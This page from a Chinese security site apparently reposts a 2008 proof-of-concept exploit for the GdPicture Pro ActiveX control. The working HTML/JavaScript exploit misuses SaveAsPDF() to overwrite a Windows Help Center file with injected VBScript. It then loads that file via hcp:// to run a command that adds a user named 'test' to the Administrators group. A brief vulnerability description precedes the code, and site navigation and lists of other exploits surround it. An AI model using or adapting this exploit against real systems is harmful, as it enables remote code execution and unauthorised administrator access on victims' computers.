首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
来源:n0b0d13s[at]gmail[dot]com 作者:EgiX 发布时间:2008-10-03  
<!--

---------------------------------------------------------------------------------
GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit
---------------------------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.gdpicture.com/
ProgID...: GdPicture4S.Imaging

Description:

SaveAsPDF() method allow to create / overwrite file through
sFilePath argument. By using other arguments, such as sTitle,
an attacker could be inject html code and execute it using
the hcp:// protocol (tecnique discovered by rgod).
Also GdPicturePro5.Imaging is prone to this vulnerability,
but it doesn't implements the IObjectSafety interface.

Tested on Windows XP SP2 with IE 6/7

Object safety report:

Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 
IPStorage Safe:  Safe for untrusted: caller,data

[*] A special thanks goes to shinnai, for his patience :)

-->

<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>

<script language='javascript'>

var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";

var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";

var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
  "\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
  "\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
  "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
  "\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";

var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'><\/object>" +
"<script language='vbscript'>wsh.Run \"" + cmd + "\", SW_HIDE<\/script>";

test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
test.CreateImageFromString(BMP);

if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";

</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Autodesk DWF Viewer Control /
·SG Real Estate Portal 2.0 Blin
·PhpCms2007 sp6 SQL injection 0
·ADN Forum <= 1.0b Blind SQL In
·MS Internet Explorer GDI+ Proo
·MySQL Quick Admin <= 1.5.5 (CO
·PHPcounter <= 1.3.2 (index.php
·phpScheduleIt <= 1.2.10 (reser
·DATAC RealWin 2.0 SCADA Softwa
·ESET SysInspector - 1.1.1.0 (e
·mIRC 6.34 Remote Buffer Overfl
·OpenX 2.6 (ac.php bannerid) Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved